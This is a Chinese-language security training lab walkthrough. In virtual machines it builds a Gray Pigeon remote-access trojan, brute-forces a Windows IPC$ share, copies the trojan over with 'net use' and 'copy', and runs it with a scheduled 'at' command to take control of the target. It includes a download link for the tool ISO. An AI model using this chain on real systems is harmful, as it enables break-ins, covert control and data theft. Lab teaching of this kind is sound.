信息安全实训——神奇的木马

一、环境介绍

1、虚拟机软件 VMware V12.0版本

2、虚拟机

3、工具 WindowsXP----模拟黑客攻击机 Windows server 2003----模拟被木马控制方 灰鸽子软件 NTscan 以上2个工具均已在"安全素材.iso"中提供。

（安全素材.iso:https://wwt.lanzoum/iqRWC09b7fib 密码:eo2f)

二、实验流程

 1.开启虚拟机 开启xp与2003共2台虚拟机，开机，并桥接到vmnet 1上。

（若两台虚拟机不再同一模式下则无法互相ping通，也无法进行通信）

2.将安全素材.iso导入到xp中，选中镜像后勾选已连接。

3.使用灰鸽子制作木马，将木马放在D盘

制作过程：

（1）点击配置服务程序

（2）自动上线设置中的IP填写攻击端的IP，在这里就是xp的IP，因为将木马种植到其他电脑上时，木马需要知道将返回信息传给谁

（3）制作完成后保存到D盘即可

 4.IPC$暴力破解

 生成密码字典，然后使用NTscan工具，设置破解IP地址范围，选择IPC$，点击start

5.与目标主机建立IPC$

net use \\10.1.1.2\ipc$ 密码 /user:用户名

6.植入木马到目标主机

copy server.exe \\10.1.1.2\d$

注意这里是d$，因为在dos窗口下输入net share查看发现磁盘的共享名是d$

7.设置目标主机运行木马

net time \\10.1.1.2
at \\10.1.1.2 17:17 d:\server.exe

8.成功控制目标主机

观察目标主机已自动上线，已可以进行监控或传输数据等操作。